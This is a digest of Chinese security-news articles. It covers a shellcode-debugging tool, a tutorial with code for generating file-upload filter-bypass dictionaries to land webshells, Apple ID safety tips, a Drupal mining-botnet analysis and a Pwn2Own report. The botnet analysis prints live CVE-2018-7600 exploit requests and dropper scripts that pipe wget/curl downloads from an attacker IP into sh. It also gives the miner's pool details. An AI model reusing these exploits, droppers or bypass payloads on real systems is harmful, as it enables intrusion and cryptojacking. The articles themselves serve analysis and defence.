BlobRunner:一款功能强大的恶意软件Shellcode调试与分析工具
Alpha_h4ck 2018-11-16 7:0 转存

今天给大家介绍的是一款名叫BlobRunner的安全分析工具,广大研究人员可以在恶意软件的分析过程中使用BlobRunner快速提取和调试恶意软件中的shellcode。

83910830198309128.png

BlobRunner能够直接在内存中定位目标文件,并跳转到内存地址(可设置偏移量或基地址)。这样一来,研究人员就能够以最简单最快速的方法去对提取出的恶意代码进行调试和分析了。

为了使用BlobRunner,你可以直接从该项目的GitHub主页下载和编译项目源码。

代码构建

整个项目代码构建的过程非常简单,大家不必担心…

依赖组件

下载并安装Microsoft Visual C++ Build Tools或Visual Studio。

构建步骤

1.打开Visual Studio的命令行窗口;

2.切换到BlobRunner所在的目录路径;

3.然后运行下列命令完成代码构建:

cl blobrunner.c

构建BlobRunner x64

实际上,构建64位版本的方法跟上面的差不多,只不过需要使用对应的64位工具:

1.打开64位版本的Visual Studio命令行窗口;

2.切换到BlobRunner所在的目录路径;

3.然后运行下列命令完成代码构建:

cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.c

工具使用

恶意代码调试步骤:

1.在你熟悉的调试器中运行BlobRunner;

2.将需要调试的Shellcode文件以参数的形式传递进去;

3.在代码跳转到Shellcode之前添加一个断点;

4.跳转到Shellcode;

BlobRunner.exe shellcode.bin

设置偏移量:

BlobRunner.exe shellcode.bin --offset 0x0100

在跳转之前不设置暂停运行,请确保已设置了断点:

BlobRunner.exe shellcode.bin –nopause

调试x64 Shellcode

x64编译器默认是不支持这个功能的,所以为了调试x64Shellcode,我们需要用加载器创建一个挂起的线程,这样我们就可以在线程恢复运行之前设置断点了。

远程调试Shell Bolb(IDAPro)

整个过程基本上跟大家在本地调试Shellcode差不多,不过在远程调试时你需要将Shellcode文件拷贝到远程系统中。如果拷贝路径跟win32_remote.exe的运行路径相同,那么你只需要将文件名以参数的形式传递进去就可以了。否则,你就得在远程系统中指定Shellcode文件的路径了。

Shellcode样本

大家可以使用Metasploitmsfvenom来快速生成Shellcode样本,下面的代码会创建一个简单的Windows exec Payload:

msfvenom -a x86 --platform windows -p windows/execcmd=calc.exe -o test2.bin

*参考来源:BlobRunner,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

原文阅读

构造优质上传漏洞Fuzz字典
gv·残亦 2018-11-16 5:30 转存

*本文作者:gv·残亦,本文属于FreeBuf原创奖励计划,未经许可禁止转载

上传漏洞的利用姿势很多,同时也会因为语言,中间件,操作系统的不同,利用也不同。比如有:大小写混合.htaccess解析漏洞00截断.绕过空格绕过::$DATA绕过,以及多种姿势的组合等等。当遇到一个上传点,如何全面的利用以上姿势测试一遍,并快速发现可以成功上传webshell的姿势?

方案一:一个一个手工测试

手工把所有姿势测试一遍,先不说花费大量时间,还很可能会遗漏掉某些姿势而导致无法利用成功。

方案二:fuzz

在fuzz时我们往往会给一个输入点喂入大量特殊的数据。这个特殊的数据可能随机的,毫无规律的,甚至我们都无法预知的。但我思考了一下,这样的fuzz方式只是适合在本地fuzz 0day漏洞,并不适合通过fuzz在线网站的上传点,快速找出可以成功上传webshell的payload,因为时间成本排在哪里。

通过思考,我们可以知道如果能根据上传漏洞的场景(后端语言,中间件,操作系统)来生成优质的fuzz字典,然后使用该字典进行fuzz,就能消除以上两个解决方案的弊端!

一、构想

在动手之前我们来思考下上传漏洞跟那些因素有关:

1.可解析的后缀,也就是该语言有多个可解析的后缀,比如php语言可解析的后缀为php,php2,php3等等

2.大小写混合,如果系统过滤不严,可能大小写可以绕过。

3.中间件,每款中间件基本都解析漏洞,比如iis就可以把xxx.asp;.jpg当asp来执行。

4.系统特性,特别是Windows的后缀加点(.),加空格,加::$DATA可以绕过目标系统。

5.语言漏洞,流行的三种脚本语言基本都存在00截断漏洞。

6.双后缀,这个与系统和中间件无关,偶尔会存在于代码逻辑之中。

整理以上思考,我们把生成字典的规则梳理为以下几条:

可解析的后缀+大小写混合

可解析的后缀+大小写混合+中间件漏洞

.htaccess + 大小写混合

可解析的后缀+大小写混合+系统特性

可解析的后缀+大小写混合+语言漏洞

可解析的后缀+大小写混合+双后缀

下面我们根据上面的构想,来分析每一方面的细节,并使用代码来实现。

二、可解析后缀

其实很多语言都这样,有多个可以解析后缀。当目标站点采用黑名单时,往往包含不全。以下我收集相对比较全面的可解析后缀,为后面生成字典做材料。

语言 可解析后缀
asp/aspx asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr
php php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml
jsp jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml

三、大小写混合

有些网站过滤比较简单,只是过滤了脚本后缀,但是没有对后缀进行统一转换为小写,在进行判断。这就纯在一个大小写问题。这里我们可以编写两个函数,一个函数是传入一个字符串,函数返回该字符串所有大小写组合的可能,第二个函数是基于第一个函数,把一个list的传入返回一个list内所有字符的所有大小写组合的可能。

## 字符串大小写混合,返回字符串所有大写可能
def str_case_mixing(word):
    str_list = []
    word = word.lower()
    tempWord = copy.deepcopy(word)
    plist = []
    redict = {}
    for char in range( len( tempWord ) ):
        char = word[char]
        plist.append(char) 
    num = len( plist )
    for i in range( num ):
        for j in range( i , num + 1 ):
            sContent = ''.join( plist[0:i] )
            mContent = ''.join( plist[i:j] )
            mContent = mContent.upper()
            eContent = ''.join( plist[j:] )
            content = '''%s%s%s''' % (sContent,mContent,eContent)
            redict[content] = None

    for i in redict.keys():
        str_list.append(i)

    return str_list

## list大小写混合
def list_case_mixing(li):
    res = []
    for l in li:
        res += uperTest(l)
    return res

四、中间件的漏洞

这块是比较复杂的一块。首先我们先来梳理下

4.1 iis

iis一共有三个解析漏洞:

1.IIS6.0文件解析 xx.asp;.jpg2.IIS6.0目录解析 xx.asp/1.jpg3.IIS 7.0畸形解析 xxx.jpg/x.asp

由于2和3和上传的文件名无关,故我们只根据1来生成fuzz字典

def iis_suffix_creater(suffix):
    res = []
    for l in suffix:
        str ='%s;.%s' % (l,allow_suffix)
        res.append(str)
    return res

4.2 apache

apache相关的解析漏洞有两个:

1.%0a(CVE-2017-15715)

2.未知后缀 test.php.xxx

根据以上构造apache_suffix_builder函数生成规则:

def apache_suffix_creater(suffix):
    res = []
    for l in suffix:
        str = '%s.xxx' % l
        res.append(str)
        str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715
        res.append(str)
    return res

4.3 nginx

nginx解析漏洞有三个:

访问连接加/xxx.php test.jpg/xxx.php

畸形解析漏洞 test.jpg%00xxx.php

CVE-2013-4547 test.jpg(非编码空格)\0x.php

nginx的解析漏洞,由于和上传的文件名无关,故生成字典无需考虑。

4.4 tomcat

tomcat用于上传绕过的有三种,不过限制在windows操作系统下。

xxx.jsp/

xxx.jsp%20

xxx.jsp::$DATA

根据以上规则生成字典对应的代码为:

win_tomcat = ['%20','::$DATA','/']
def tomcat_suffix_creater(suffix):
    res = []
    for l in suffix:
        for t in win_tomcat:
            str = '%s%s' % (l,t)
            res.append(str)
    return res

如果确定中间件为apache,可以加入.htaccess。同时如果操作系统还为windows,我们可以大小写混合。

if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'):
    htaccess_suffix = uperTest(".htaccess")
elif (middleware == 'apache' or middleware == 'all') and os == 'linux':
    htaccess_suffix = ['.htaccess']
else:
    htaccess_suffix = []

4.5 语言,中间件与操作系统的关系

以上我们根据每个中间件的漏洞,编写了对应的fuzz字典生成函数。在最终生成字典时,我们还要考虑中间件可以运行那些语言,以及它们与平台的关系。

语言 IIS Apache Tomcat Window Linux
asp/aspx ×
php
jsp ×

根据上表,我们明白:

iis下可以运行asp/aspx,php,jsp脚本,故这3种脚本语言可解析后缀均应该传入iis_suffix_builder()进行处理;

apache下可以运行asp/aspx,php。故这2两种脚本语言可解析后缀均应该传入apache_suffix_builder()进行处理;

tomcat下可以运行php,jsp,故这两个脚本语言可解析后缀均应该传入tomcat_suffix_builder()进行处理。

注意:根据对tomcat上传的绕过分析,发现之后在windows平台下才能成功。故之后在Windows平台下才会调用tomcat_suffix_builder()对可解析后缀进行处理。

故伪代码可以编写如下:

if middleware == 'iis':
    case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix
    middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix)
elif middleware == 'apache':
    case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
    middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
elif middleware == 'tomcat' and os == 'linux':
    middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
elif middleware == 'tomcat' and (os == 'win' or os == 'all'):
    case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
    middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
else:
    case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix
    iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix)
    case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
    apache_parse_suffix = apache_build(case_asp_php_html_parse_suffix)
    case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
    tomcat_parse_suffix = tomcat_build(case_php_jsp_parse_suffix)        
    middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix

五、系统特性

经过查资料,目前发现在系统层面,有以下特性可以被上传漏洞所利用。

Windows下文件名不区分大小写,Linux下文件名区分大写欧西;

Windows下ADS流特性,导致上传文件xxx.php::$DATA = xxx.php;

Windows下文件名结尾加入.,空格,<>,>>>,0x81-0xff等字符,最终生成的文件均被windows忽略。

# 生成0x81-0xff的字符list
def str_81_to_ff():
    res = []
    for i in range(129,256):
        str = '%x' % i
        str = '%' + str
        str = urllib.unquote(str)
        res.append(str)
    return res
windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff()
def windows_suffix_builder(suffix):
    res = []
    for s in suffix:
        for w in windows_os:
            str = '%s%s' % (s,w)
            res.append(str)
    return res

六、语言的漏洞

语言漏洞被利用于上传的有%00截断和0×00截断。它们在asp,php和jsp中都存在着。

def str_00_truncation(suffix,allow_suffix):
    res = []
    for i in suffix:
        str = '%s%s.%s' % (i,'%00',allow_suffix)
        res.append(str)
        str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix)
        res.append(str)
    return res

七、双后缀

有些站点通过对上传文件名进行删除敏感字符(php,asp,jsp等等)的方式进行过滤,例如你上传一个aphp.jpg的文件,那么上传之后就变成了a.jpg。这时就可以利用双后缀的方式上传一个a.pphphp,最终正好生成a.php。其实双后缀与中间件和操作系统无关,而是和代码逻辑有关。

针对双后缀,我们可以写个str_double_suffix_creater(suffix)函数,传入后缀名suffix即可生成所有的双后缀可能。

def str_double_suffix_creater(suffix):
    res = []
    for i in range(1,len(suffix)):
        str = list(suffix)
        str.insert(i,suffix)
        res.append("".join(str))
    return res

list_double_suffix_creater(suffix)函数基础上,可以编写list_double_suffix_creater(list_suffix)来为一个list生成所有双后缀可能。

def list_double_suffix_creater(list_suffix):
    res = []
    for l in list_suffix:
        res += double_suffix_creater(l)
    return duplicate_removal(res)

八、整合代码

上面我们针对和上传漏洞相关的每个方面进行了细致的分析,也提供了相关的核心代码。最终整合后的代码限于边幅,就放在github上了。

github:https://github.com/c0ny1/upload-fuzz-dic-builder

$ python upload-fuzz-dic-builder.py -h
usage: upload-fuzz-dic-builder [-h] [-n] [-a] [-l] [-m] [--os] [-d] [-o]

optional arguments:
  -h, --help            show this help message and exit
  -n , --upload-filename
                        Upload file name
  -a , --allow-suffix   Allowable upload suffix
  -l , --language       Uploaded script language
  -m , --middleware     Middleware used in Web System
  --os                  Target operating system type
  -d, --double-suffix   Is it possible to generate double suffix?
  -o , --output         Output file

脚本可以之定义生成的上传文件名(-n),允许的上传的后缀(-a),后端语言(-l),中间件(-m),操作系统(–os),是否加入双后缀(-d)以及输出的字典文件名(-o)。我们可以根据场景来生成合适的字典,提供的信息越详细,脚本生成的字典越精确。

九、案例

upload-labs靶场的Pass-03到Pass-10其实都是关于后缀的,在不知道代码的情况下,我们如何快速发现可以绕过的后缀呢?这时我们就可以使用upload-fuzz-dic-builder.py脚本生成fuzz字典,来进行fuzz。这里我选择Pass-09来给大家演示。

1.利用脚本生成fuzz字典

由于知道我们的后端语言为php,中间件为apache,操作系统为Windows。所以可以利用这些信息生成更精确的fuzz字典。

$ python upload-fuzz-dic-builder.py -l php -m apache --os win
[+] 收集17条可解析后缀完毕!
[+] 加入145条可解析后缀大小写混合完毕!
[+] 加入152条中间件漏洞完毕!
[+] 加入37条.htaccess完毕!
[+] 加入10336条系统特性完毕!
[+] 去重后共10753条数据写入upload_fuzz_dic.txt文件

图1-生成的字典

2.抓包使用burp的Intruder模块对上传名称进行fuzz

抓取upload-labs的Pass-09的上传包,发送到Intruder模块,加载第一步脚本生成的fuzz字典,对上传的包的文件名进行fuzz。

图2-fuzz结果

经过测试,通过fuzz可以快速找到可以突破upload-labs那些基于后缀的Pass的payload。甚至fuzz出同一个Pass多种绕过的方法。

*本文作者:gv·残亦,本文属于FreeBuf原创奖励计划,未经许可禁止转载

原文阅读

绑定金融账号的Apple ID有风险,外媒也来支招
Alpha_h4ck 2018-11-16 5:0 转存

aaaaaaaaaaaa.png

根据Bloomberg的最新报道,近期发生了一系列针对天朝人民的网络攻击,网络犯罪分子利用窃取来的Apple ID来入侵用户的账号,并从中窃取大量金钱。随后,腾讯和阿里巴巴均提醒了各自用户,需警惕账号异常情况,尤其是那些支付宝账号、微信支付账号、数字钱包或信用卡绑定了Apple ID的用户。

事件发生之后,阿里巴巴和苹果正在全力调查这一罕见的安全泄露事件以及攻击者破解Apple ID的方法。与此同时,他们也在敦促用户降低自己的交易限额来防止更多的财产损失。由于苹果方面目前还没有解决这个问题,因此微信支付和支付宝绑定了Apple ID的用户仍有可能受到此次攻击的影响,苹果同时也建议广大用户尽快修改自己的AppleID密码。

此次安全泄露事件也表明,接下来将会有一大波类似的网络安全事件将会发生。由于在线支付服务的日益普及,因此在这一波网络攻击中,网络犯罪分子主要针对的就是数字支付服务。而Apple ID就是一个攻击切入点,因为Apple ID关联了用户的所有信息、设备和产品。这种与用户个人信息有着强互联互通性的元素(Apple ID)对于网络犯罪分子来说,绝对是一个金矿。很多用户其实并不认为Apple ID是一个非常“大”的东西,但是如果无法有效保护自己的数字凭证,自己的经济财产以及个人信息也就无法得到保证了。

bbbbbbbbbbbbb.png

接下来,我们会给大家提供几个保护自己账号安全的方法:

1、 设置健壮的密码:你的密码是抵御网络攻击的第一道防线,所以在设置密码的时候应该尽可能地复杂。比如说在密码中同时设置大写或小写字母,或者添加特殊符号等等。密码越复杂,破解的难度也就更大。

2、 不同账号设置不同的登录信息:很多用户会用相同的邮箱和密码注册大部分的网站服务,其中包括Apple ID在内。为了更好地保护我们的Apple ID,尤其是那些绑定了金融账号的Apple ID,希望大家将绑定的邮箱修改为一个独立的邮箱,并设置独立的密码。

3、 启用双因素验证:开启双因素身份验证功能之后,大家可以设置更多的账户验证信息,虽然这会给大家日常的账号登录带来一些不便,但换来的是更强的安全性。

4、 监控你的金融账号:Apple ID在绑定了金融账号之后,大家需要定期检查自己绑定的金融账号以及信用卡的消费情况,及时上报可疑的交易。大多数借记卡和贷记卡都提供了免费的卡片异常监控服务。另外,不要吝啬那每个月几块钱的短信提醒服务,因为省了这些钱,你可能损失的会更多…

*参考来源:securingtomorrow,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

原文阅读

利用Drupal漏洞进行传播的挖矿僵尸病毒分析
cgf99 2018-11-16 2:0 转存

*本文原创作者:cgf99,本文属于FreeBuf原创奖励计划,未经许可禁止转载

一、事件背景

在对服务器进行例行性检查的时候,在一台ngix服务器的日志文件access.log里面发现了一些奇怪的访问记录,如下表所示。备注,这台Ngix 服务器安装windows10企业版操作系统,web服务器是nginx/1.12.2。

来源IP 时间 数据
85.248.227.163 16/Oct/2018:13:14:41 +0800 “POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=nohup+wget+-O+-+http%3A%2F%2F164.132.159.56%2Fdrupal%2Fup.sh%7Csh+2%3E%261&name%5B%23type%5D=markup HTTP/1.1″ 301 185 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0″
85.248.227.163 16/Oct/2018:13:14:41 +0800 “GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=nohup+wget+-O+-+http%3A%2F%2F164.132.159.56%2Fdrupal%2Fup.sh%7Csh+2%3E%261&name%5B%23type%5D=markup HTTP/1.1″ 200 8517 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0″
85.248.227.163 16/Oct/2018:13:14:43 +0800 “POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=nohup+curl+http%3A%2F%2F164.132.159.56%2Fdrupal%2Fup.sh%7Csh+2%3E%261&name%5B%23type%5D=markup HTTP/1.1″ 301 185 “-” “Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36″
85.248.227.165 16/Oct/2018:13:14:47 +0800] “GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=nohup+curl+http%3A%2F%2F164.132.159.56%2Fdrupal%2Fup.sh%7Csh+2%3E%261&name%5B%23type%5D=markup HTTP/1.1″ 200 8517 “-” “Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36″  

经过整理,发现上述web访问的命令其实就是下列两行,分别用GET和POST向目标网站进行请求访问。

https://mywebsite/?q=user/password&name[#post_render][]=passthru&name[#markup]=nohup wget –O – http://164.132.159.56/drupal/up.sh|sh 2>&1&name[#type]=markup
https://mywebsite/?q=user/password&name[#post_render][]=passthru&name[#markup]=nohup curl http://164.132.159.56/drupal/up.sh|sh 2>&1&name[#type]=markup

乍一看,就是向服务器发送请求,利用web服务器上的一个漏洞,并要求服务器执行wget和curl命令去下载并执行up.sh脚本。可是我的服务器明明是windows操作系统,就算有漏洞触发了也不会执行该命令。因此,本次web攻击请求应该不是人工发出的(应该不会有这么蠢的黑客吧,也可能看web服务器是Ngix,就默认为类linux系统)。此外,通过网络搜索关键字,发现这段代码是Drupal远程代码执行漏洞(CVE-2018-7600)的利用方式。今年上半年,Drupal漏洞非常火爆,使得一拨又一拨的僵尸网络高潮迭起。由此可见,本次的web请求访问应该是僵尸病毒在自动化的扫描,利用Drupal漏洞进行攻击传播扩散。可是,这些病毒作者为什么就不能稍微花点功夫,先对目标网站软件环境进行判断,然后再实施下一步的实质攻击步骤呢?

尽管这次攻击没有对本地服务器产生任何危害。但是,既然不请自来,那就花点功夫研究一下吧。

1.下载脚本

直接访问http://164.132.159.56/drupal/up.sh下载up.sh,发现其内容如下:

#!/bin/sh

crontab-r;

id0="[[^$I$^]]"

id1="atnd"

ps -fe|grep -v grep | grep -q "`echo $id0`\|`echo $id1`"

if [ $?-ne 0 ];then

wget -O- http://164.132.159.56/drupal/bups.sh|sh ; curl http://164.132.159.56/drupal/bups.jpg|sh ;

else

echo"......."

fi

再次下载bups.sh和bups.jpg文件,其内容是一样的,具体内容如下:

 #!/bin/sh

id0="[[^$I$^]]"

id1="atnd"

id2="ooo"

ps -fe |grep -v grep | grep -q "`echo$id0`\|`echo $id1`"

if [ $? -ne 0 ];then

if [ -x "/var/tmp/" ] &&[ -w "/var/tmp/" ];then

rm -rf /var/tmp/.*

rm -rf /var/tmp/*

wget -O /var/tmp/`echo $id1`http://164.132.159.56/drupal/2/`echo $id2`

curl -o /var/tmp/`echo $id1`http://164.132.159.56/drupal/2/`echo $id2`

chmod +x /var/tmp/`echo $id1`

chmod 777 /var/tmp/atnd

/var/tmp/`echo $id1` &

else

rm -rf /tmp/.*

rm -rf /tmp/*

wget -O /tmp/`echo $id1`http://164.132.159.56/drupal/2/`echo $id2`

curl -o /tmp/`echo $id1`http://164.132.159.56/drupal/2/`echo $id2`

chmod +x /tmp/`echo $id1`

chmod 777 /tmp/atnd

/tmp/`echo $id1` &

fi

else

echo "Running....."

fi

上面脚本很简单,就是下载恶意软件并运行的过程。脚本首先判断是否存在名叫id0和id1的进程(如果存在说明目标系统已被感染,恶意软件已运行中)。接着判断/var/tmp目录是否存在并可执行可写,如能是,则把恶意软件下载放在该目录下,否则就放在/tmp/目录下。木马下载路径是http://164.132.159.56/drupal/2/ooo,存放在本地的名字是id1,也就是”atnd”。此外,id0参数只是简单调用了一下,说明此轮感染操作应该不是第一波,在此前的病毒传播阶段,攻击者下载恶意软件后本地保存的文件名是id0,也就是”[[^$I$^]]”。

手动访问下载ooo,其属性如下表所示。

属性
大小 21176
MD5 7fdc31d7b9fafd2fbbb4da22b3cf56a2
SHA1 4e8bdca8d9a2eec23f17206af6e9f70daad29a25

2.构建环境

本地环境是Ubuntu16.04虚拟机。把ooo文件拷贝到虚拟机下/var/tmp/atnd,执行后,发现ubuntu系统退出登录,重新输入密码,一闪又回到登录界面。晕。

通过wireshark抓包,发现测试环境和80.240.26.52以及164.132.159.56两个IP发生如下的网络连接。

1.首先访问下载http://164.132.159.56/drupal/lu.sh文件,其内容如下。

图片.png

lu.sh执行后会区访问下载bups.sh和bups.jpg,这两个文件的内容上一段已经介绍。

2.下载http://164.132.159.56/drupal/bups.sh

3.下载http:// 164.132.159.56/drupal/2/ooo

4.再次下载http:// 164.132.159.56/drupal/2/ooo

5.下载http:// 80.240.26.52/d/sss

6.下载http:// 80.240.26.52/d/lmmml

其中,步骤1-4下载的文件已经清晰,手动下载步骤5和步骤6的文件,下载后的文件信息如下表所示。

文件名 大小 MD5 SHA1
sss 16360 8a8ddce64e5dd6f5864da18d7899351c edb7aac788cb25a2f36bd71244843a9289a97d4e
lmmml 719144 2e483fe7736634134b1b0d82828f2e53 583f5a66117f76a9dea389070ed0c8470e330e47

3.相关IP初步分析

1.攻击者来源IP

从Ngix日志提取的攻击者IP为85.248.227.163和85.248.227.165。

通过ip138查询,结果如下:

开放80和443端口,直接http方式访问,显示的页面如下图所示。咦,竟然是Tor节点,上面显示了服务器的性能。利用https访问,则没有显示页面。发现域名是Enn.lu。

图片.png

在本地pingenn.lu解析结果如下:

正在Ping enn.lu [176.10.250.105] 具有 32 字节的数据:

来自176.10.250.105 的回复: 字节=32 时间=310ms TTL=47

来自176.10.250.105 的回复: 字节=32 时间=308ms TTL=47

来自176.10.250.105 的回复: 字节=32 时间=309ms TTL=47

来自 176.10.250.105 的回复: 字节=32 时间=308ms TTL=47

IP地址不一样,而且直接访问enn.lu网站都是直接跳转到https访问方式,其首页界面如下图所示。

图片.png

看来很有可能是假冒页面。

直接在http://85.248.227.163查看其源代码,果不其然,该页面只是简单的链接到enn.lu网站。

此外,除了日志中发现的85.248.227.163和85.248.227.165地址外,还发现85.248.227.164地址与它们功能相同,三者网站页面都是假冒的Enn.lu域名,也就是说,攻击者至少拥有或控制这三个IP地址的主机。

2.http下载地址分析

所有的sh脚本都是通过访问164.132.159.56下载的。IP查询结果如下。

_______________________________________ 

您查询的IP:164.132.159.56

•本站数据:法国

•参考数据1:法国法国ovh.com

•参考数据2:意大利

•兼容IPv6地址:::A484:9F38

•映射IPv6地址:::FFFF:A484:9F38

________________________________________

直接用浏览器进行http访问,结果如下所示。 

Not Found

The requested URL / was not found on this server.

________________________________________

Apache/2.4.18 (Ubuntu) Server at 164.132.159.56 Port 80

3.ooo通联地址

ooo程序运行后会访问下载80.240.26.52地址用于下载sss以及lmmml程序。对地址80.240.26.52的查询结果如下。

________________________________________

您查询的IP:80.240.26.52

本站数据:希腊

参考数据1:希腊希腊

参考数据2:希腊

兼容IPv6地址:::50F0:1A34

映射IPv6地址:::FFFF:50F0:1A34

________________________________________

直接浏览器访问后的结果如下:

403 Forbidden

________________________________________

nginx/1.10.3 (Ubuntu)

二、程序分析

1.ooo程序

1.循环kill进程

读取/proc/下的进程列表,如果进程PID<=1000则不处理,否则杀掉原来设定的病毒进程名字,比如atnd、[^$I$^]。代码如下图所示:

图片.png2.判读目录是否存在可写,下载相应文件到本地并执行:

图片.png

3.网络下载的函数:

图片.png4.定时任务,如果有wget用wget下载命令,否则用curl下载命令。把下载命令用base64编码后,生成定时任务命令。

图片.png5.while循环操作,杀进程,下载执行、sleep:

图片.png

2.lmmml程序

拷贝lmmml到桌面下,直接运行后,发现lmmml其实是一个挖矿程序。

1.进程改名

Lmmml运行后的进程改名为[^$I$^]。

图片.png

图片.png

2.矿池分析

它连接的矿池是:95.179.153.229:7777。

图片.png对其利用IDA反汇编可以看到,其连接的矿池地址有两个,分别是95.179.153.229的7777和80端口。如下图所示:

图片.png

可是,网络抓包发现它登录的挖矿帐号和密码竟然都是设置成x,并没有发送实际的挖矿帐号,很奇怪。

{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"http","algo":["cn","cn/2","cn/1","cn/0","cn/xtl","cn/msr","cn/xao","cn/rto"]}}

浏览器直接访问95.179.153.229的80端口和7777登录,发现返回字符串”Mining Proxy Online”。看来该台服务器是攻击者自架设的一个挖矿代理服务器。同时,在对lmmml静态反汇编分析的时候,发现与此前发现的挖矿代码不同,作者应该是自己重新修改编译了源代码,变化非常大,此前常见的静态字符串都做了处理。

结合挖矿的帐号设置成x,是否有可能是作者自己修改编译了mining-proxy的代码,把所有的被感染机器发送过来的账号x都在proxy端再进行重新设置,然后发送给实际的矿池,从而形成统一挖坑又保护自身挖坑账号的目的,不让分析的人员知道该账户的具体情况(比如实际收益情况等)。

三、结束语

通过上述简单分析,大致可以得出下列结论:

1.该次web服务器的网络异常请求访问应该是一次来自僵尸病毒的自动攻击行为;

2.该僵尸病毒利用Drupal漏洞进行传播;

3.该僵尸病毒已经实施了多波次的感染行动;

4.攻击者主要目的用于挖矿,可根据需要随时更换恶意代码功能文件。至于目前挖矿的账号用x是否如分析的一样有待商榷。

5.攻击者利用的资源比较分散,比如85.248.227.163/85.248.227.164/85.248.227.165三个IP地址用于伪造网站与实施Drupal漏洞攻击,164.132.159.56用于下载攻击脚本文件, 80.240.26.52用于病毒实体文件的下载。

*本文原创作者:cgf99,本文属于FreeBuf原创奖励计划,未经许可禁止转载

原文阅读

Pwn2Own Tokyo 2018:iPhone X、三星S9、小米6被逐个攻破
shidongqi 2018-11-16 1:10 转存

移动安全已经变得越发重要,因此也成为了黑客们关注的重点。在刚刚结束的Pwn2Own Tokyo 2018 上,一群黑客相继对不同的手机发起了猛攻,最终,小米6 五次挑战中均被攻破,此外iPhone X 和三星 S9也未能幸免于黑客攻击。

在智能手机机型选择上,本次举办方总共提供了以下五款机型:

Google Pixel 2

三星Galaxy S9

Apple iPhone X

华为P20

小米Mi6

谁也没想到海外市场份额相对较少的小米 6却受到了最大的针对,五次被挑战无一失败。而Google Pixel 2以及华为 P20 却无人问津。

_DSC0272.jpeg

本次Pwn2Own Tokyo 2018 为期两天,有三组队伍参与挑战,根据规则,参赛选手需要利用浏览器、蓝牙、NFC、WI-FI、MMS/SMS或者基带的漏洞来对手机发起挑战。而挑战顺序由随机抽签决定,最终第一天安排了6项挑战,第二天有五项,总共11项挑战。

在第一天的行程中,一血就落在了小米6身上。Fluoroacetate的两名白帽,利用NFC 漏洞接管了小米6,通过一触式连接的特性,强制打开浏览器跳转到特定的网页。该页面利用WebAssembly 中越界写入在手机上执行代码。完成这项挑战,让他们获得30000美元的奖金以及6个积分。

_DSC0318-2.jpgFluoroacetate在进行漏洞确认

而第二项挑战依然是针对小米6,MWR实验室利用五个不同的漏洞在小米6上成功执行代码。

第一天的行程中最终六项挑战无一失败,其中仅仅是小米6就已经被针对的三次,而三星S9的基带漏洞和WI-FI漏洞也让其沦陷两次,黑客利用WI-FI漏洞成功攻破了iPhone X。在积分榜上,Fluoroacetate 以31分的优势遥遥领先。

Dr3xQhyU8AA66UU.jpg

第二天剩下的五项挑战主要集中在小米6和iPhone X身上,小米 6依然在两次挑战中没能挡住黑客的攻击。而黑客对iPhone X的破解却没有第一天那么顺利了,三项跳转仅仅成功一了一项,其它均以失败告终。

唯一成功的一次依然来自于Fluoroacetate 团队,在iPhone X浏览器漏洞挑战中,他们利用越界权限成功从iPhone X中获取数据,再次斩获第二天的“一血”,获得50000美金奖励以及8个积分,继续扩大领先优势。

Dr8s8x3VYAA9ber.jpg

最终两天的比赛结束,Fluoroacetate 团队以 45个积分的绝对优势称为本届比赛的“Master of pwn”。

Pwn2Own Tokyo 2018 落下帷幕,小米 6意外的接受了最多的挑战。不仅是Android 手机,包括iPhone 在内,可以看到的情况是,浏览器的安全问题依然是智能手机的最大隐患。

1503573587-40cfa560c88b4fe09275acc0295123d2.jpg

虽然Google Pixel 2和华为 P20 虽然没有被挑战,不意味着其安全问题就不存在。这一次,来自苹果、三星、谷歌、华为以及小米的代表都在Pwn2Own现场,关注自己产品被破解的情况,如果有需要他们也可以随时对白帽子发起提问。

此外,比赛结束后,相关的厂商均会收到本次比赛涉及的漏洞通知,给予90天的时间来修复漏洞,所以,相信不久之后,小米、苹果、三星都会及时发布漏洞补丁以完善自身产品的安全性。

*本文作者:Andy.i,转载请注明来自FreeBuf.COM

原文阅读

智能合约迁移的工作原理
